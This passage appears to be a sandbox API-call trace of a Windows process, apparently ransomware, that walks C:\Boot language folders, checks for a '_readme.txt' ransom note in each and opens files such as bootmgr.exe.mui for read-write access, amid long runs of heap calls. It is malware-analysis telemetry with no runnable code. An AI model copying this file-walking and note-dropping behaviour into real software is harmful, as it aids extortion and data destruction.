returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.087] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.087] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.088] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0093.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.088] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.088] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.088] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.088] PathFindFileNameW (pszPath="") returned="" [0093.088] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.088] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.089] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.089] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99c9c68 [0093.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0093.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.089] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x81c) returned 0x99c9c68 [0093.089] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0093.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.089] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0093.089] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.089] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.089] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa334c6e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa334c6e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.090] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa334c6e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa334c6e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.090] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.090] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned=".mui" [0093.090] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.090] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa334c6e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa334c6e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa334c6e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31758b8 [0093.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.090] PathFindExtensionW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned=".txt" [0093.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.090] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa334c6e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa334c6e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa334c6e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.090] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.090] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.090] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.090] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.090] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.091] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.091] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.092] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.092] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.093] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.093] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.093] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0093.094] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.094] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.094] PathFindFileNameW (pszPath="") returned="" [0093.094] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.094] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.094] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.094] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.094] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.094] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0093.094] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.095] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0093.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.095] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.095] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0093.095] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.095] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3372840, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3372840, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.095] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, 